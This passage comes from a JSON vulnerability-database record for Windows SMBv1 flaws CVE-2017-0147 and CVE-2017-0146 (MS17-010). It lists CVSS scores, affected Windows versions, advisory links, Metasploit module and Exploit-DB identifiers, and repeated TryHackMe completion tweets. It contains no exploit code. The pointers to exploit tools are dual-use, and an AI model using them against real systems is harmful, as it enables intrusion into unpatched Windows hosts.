"affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", 
"hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "ab861885dbe02d09a3a2208dd9731d62"}, {"key": "cvss", "hash": "876f47c4ebc2b9e0dd17afaa22819f2a"}, {"key": "cvss2", "hash": "54741b582bd860909f9fa2ec54e49c77"}, {"key": "cvss3", "hash": "6425b40b29b1f10d6066f4a71bb91df7"}, {"key": "cwe", "hash": "b647a850fd42b235dd11ee60cf626f2d"}, {"key": "description", "hash": "304c200bf4a637f269c9acaf5f79c209"}, {"key": "extraReferences", "hash": "5507d5c78225820afa0f2f84d3724b48"}, {"key": "href", "hash": "0e53d0deb991b66bb6a7a414e375241c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "bf1f670b69a274ab442a5372b2d4378c"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "86a69a73afce6263b58d42af8e129794"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a113503091866f2cc93d469f43b94418d13a065d2179d3d30448f17ca49bde01", "viewCount": 174, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96709"]}, {"type": "securelist", "idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 4.6, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 88, "tweets": [{"link": "https://twitter.com/RonnyArias/status/1422356892483981314", 
"text": "Blue - I have just completed this room! Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-200"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": 
"microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], 
"vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "1037991", "refsource": "SECTRACK", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "96709", "refsource": "BID", "tags": ["Third Party Advisory", "VDB Entry"], "url": "http://www.securityfocus.com/bid/96709"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": 
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0146", "bulletinFamily": "NVD", "title": "CVE-2017-0146", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "reporter": "secure@microsoft.com", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", 
"http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0146"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": 
["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, 
"cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.5, "vector": "NONE"}, "twitter": {"counter": 55, "modified": "2021-02-02T06:36:30", "tweets": [{"link": 
"https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": 